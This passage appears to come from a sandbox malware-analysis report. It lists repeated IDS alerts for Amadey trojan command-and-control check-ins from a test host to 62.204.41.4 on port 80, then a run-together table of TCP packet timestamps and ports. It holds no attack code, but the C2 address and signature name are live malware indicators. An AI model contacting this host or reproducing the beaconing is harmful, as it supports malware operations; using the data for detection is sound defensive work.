                                                                      192.168.2.762.204.41.450238802027700 02/06/23-18:38:16.299287TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449767802027700 02/06/23-18:36:08.035707TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449749802027700 02/06/23-18:36:03.660431TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449904802027700 02/06/23-18:36:43.781750TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449815802027700 02/06/23-18:36:21.210734TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450327802027700 02/06/23-18:38:39.273408TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450250802027700 02/06/23-18:38:19.214721TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450291802027700 02/06/23-18:38:30.738198TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449856802027700 02/06/23-18:36:30.850298TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450161802027700 02/06/23-18:37:56.171482TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450072802027700 02/06/23-18:37:33.278393TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450297802027700 02/06/23-18:38:32.224802TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449822802027700 02/06/23-18:36:22.933332TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450167802027700 02/06/23-18:37:57.576211TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450256802027700 02/06/23-18:38:20.656895TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449911802027700 02/06/23-18:36:48.462366TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450078802027700 02/06/23-18:37:34.718345TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450266802027700 02/06/23-18:38:23.033535TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450355802027700 02/06/23-18:38:48.066556TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449736802027700 02/06/23-18:36:00.525448TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450269802027700 02/06/23-18:38:23.765845TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450006802027700 02/06/23-18:37:15.979491TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450358802027700 02/06/23-18:38:48.804091TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449840802027700 02/06/23-18:36:27.290138TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449996802027700 02/06/23-18:37:11.560689TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450177802027700 02/06/23-18:37:59.985865TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449825802027700 02/06/23-18:36:23.646592TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449751802027700 02/06/23-18:36:04.175861TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450110802027700 02/06/23-18:37:42.371968TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449917802027700 02/06/23-18:36:49.905140TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449739802027700 02/06/23-18:36:01.266268TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449999802027700 02/06/23-18:37:14.145161TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449828802027700 02/06/23-18:36:24.349767TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450281802027700 02/06/23-18:38:28.378215TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450192802027700 02/06/23-18:38:03.610612TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450088802027700 02/06/23-18:37:37.171595TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449968802027700 02/06/23-18:37:04.244029TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450021802027700 02/06/23-18:37:19.783407TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449901802027700 02/06/23-18:36:43.063640TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449761802027700 02/06/23-18:36:06.571220TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450009802027700 02/06/23-18:37:16.756199TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450342802027700 02/06/23-18:38:43.108288TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450212802027700 02/06/23-18:38:10.033408TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449983802027700 02/06/23-18:37:08.027985TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449942802027700 02/06/23-18:36:57.946569TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450123802027700 02/06/23-18:37:45.530650TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449853802027700 02/06/23-18:36:30.146489TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449812802027700 02/06/23-18:36:20.476057TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449894802027700 02/06/23-18:36:41.381593TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449764802027700 02/06/23-18:36:07.304245TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450253802027700 02/06/23-18:38:19.923435TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450301802027700 02/06/23-18:38:33.190298TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449914802027700 02/06/23-18:36:49.185768TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450294802027700 02/06/23-18:38:31.479059TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450075802027700 02/06/23-18:37:34.012824TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450164802027700 02/06/23-18:37:56.874762TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450034802027700 02/06/23-18:37:22.947074TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.762.204.41.4
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                      Feb 6, 2023 18:36:01.085381031 CET804973862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.085551023 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.203288078 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.203911066 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.264082909 CET804973862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.264341116 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.265259027 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.265423059 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.266268015 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.327723026 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.331387043 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.331541061 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.442477942 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.443190098 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.503952980 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.504009008 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.504192114 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.504410982 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.508138895 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.568891048 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.572156906 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.572357893 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.674979925 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.676522970 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.735892057 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.736025095 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.737852097 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.737999916 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.744620085 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.806118011 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.808621883 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.808832884 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.924973965 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.925661087 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.985292912 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.985420942 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.986509085 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.986547947 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.986638069 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.045990944 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.050532103 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.050724030 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.172569990 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.173794985 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.232286930 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.232494116 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.235124111 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.235337019 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.235831976 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.297024012 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.300020933 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.300312996 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.409369946 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.412878990 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.470851898 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.471018076 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.474483967 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.474662066 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.475153923 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.536710024 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.539536953 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.539650917 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.645144939 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.645919085 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.706635952 CET804974562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.706790924 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.706799984 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.706861019 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.707218885 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.767838955 CET804974562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.771678925 CET804974562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.771795988 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.877701044 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.878559113 CET4974680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.938514948 CET804974562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.938713074 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.939913034 CET804974662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.940123081 CET4974680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.941803932 CET4974680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.003154039 CET804974662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.006386995 CET804974662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.006493092 CET4974680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.113095045 CET4974680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.116791964 CET4974780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.174587011 CET804974662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.174657106 CET4974680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.176148891 CET804974762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.176237106 CET4974780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.176630020 CET4974780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.235856056 CET804974762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.239852905 CET804974762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.239954948 CET4974780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.361915112 CET4974780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.362642050 CET4974880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.421358109 CET804974762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.422341108 CET4974780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.423362017 CET804974862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.423537016 CET4974880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.424266100 CET4974880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.485148907 CET804974862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.489942074 CET804974862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.490109921 CET4974880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.596822977 CET4974880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.597526073 CET4974980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.657746077 CET804974862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.657918930 CET4974880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.659907103 CET804974962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.660057068 CET4974980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.660430908 CET4974980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.722753048 CET804974962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.726121902 CET804974962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.728737116 CET4974980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.832024097 CET4974980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.850671053 CET4975080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.894551039 CET804974962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.896780968 CET4974980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.912425041 CET804975062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.914429903 CET4975080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.933991909 CET4975080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:03.995696068 CET804975062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:03.998970985 CET804975062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.002090931 CET4975080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.112977028 CET4975080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.113709927 CET4975180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.174123049 CET804975162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.174524069 CET804975062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.174892902 CET4975180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.174928904 CET4975080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.175860882 CET4975180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.236529112 CET804975162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.240720034 CET804975162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.241595030 CET4975180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.346417904 CET4975180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.347124100 CET4975280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.409073114 CET804975162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.409414053 CET4975180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.409883976 CET804975262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.410036087 CET4975280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.410535097 CET4975280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.471887112 CET804975262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.474786043 CET804975262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.474935055 CET4975280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.585745096 CET4975280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.586478949 CET4975380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.647476912 CET804975262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.647730112 CET4975280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.647905111 CET804975362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.648156881 CET4975380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.648624897 CET4975380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.712376118 CET804975362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.715003014 CET804975362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.715151072 CET4975380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.835706949 CET4975380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.836760044 CET4975480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.897358894 CET804975362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.897542000 CET4975380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.897973061 CET804975462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.898118019 CET4975480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.905747890 CET4975480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:04.967133999 CET804975462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.969631910 CET804975462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:04.969783068 CET4975480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.083237886 CET4975480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.084645033 CET4975580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.144880056 CET804975462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.144993067 CET804975562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.144994020 CET4975480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.145179033 CET4975580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.145544052 CET4975580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.205926895 CET804975562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.211611986 CET804975562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.211750031 CET4975580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.316020012 CET4975580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.316934109 CET4975680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.376929998 CET804975562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.377068043 CET4975580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.379084110 CET804975662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.379244089 CET4975680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.379931927 CET4975680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.442055941 CET804975662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.444961071 CET804975662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.445060015 CET4975680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.551558971 CET4975680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.552299976 CET4975780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.613264084 CET804975762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.613456964 CET4975780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.614207029 CET804975662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.614238024 CET4975780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.614306927 CET4975680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.675255060 CET804975762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.678282976 CET804975762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.678402901 CET4975780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.784414053 CET4975780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.785482883 CET4975880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.844374895 CET804975762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.844523907 CET4975780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.846944094 CET804975862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.847151041 CET4975880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.847455978 CET4975880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:05.910685062 CET804975862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.912489891 CET804975862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:05.912635088 CET4975880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:06.018600941 CET4975880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:06.020759106 CET4975980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:06.081608057 CET804975862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:06.081721067 CET4975880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:06.083825111 CET804975962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:06.084002972 CET4975980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:06.092267990 CET4975980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.665966988 CET4978780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.726437092 CET804978762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:12.728543043 CET804978762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:12.728642941 CET4978780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.833291054 CET4978780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.834188938 CET4978880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.893975019 CET804978762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:12.894057989 CET4978780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.896823883 CET804978862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:12.896945953 CET4978880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.897780895 CET4978880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:12.958452940 CET804978862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:12.961004972 CET804978862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:12.961150885 CET4978880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.068578005 CET4978880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.069329023 CET4978980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.129481077 CET804978862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:13.129520893 CET804978962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:13.129602909 CET4978880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.129637003 CET4978980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.130119085 CET4978980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.191332102 CET804978962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:13.194447041 CET804978962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:13.194544077 CET4978980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.302576065 CET4978980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.303555012 CET4979080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.363235950 CET804978962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:13.363341093 CET4978980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:13.364995956 CET804979062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:13.365092039 CET4979080192.168.2.762.204.41.4
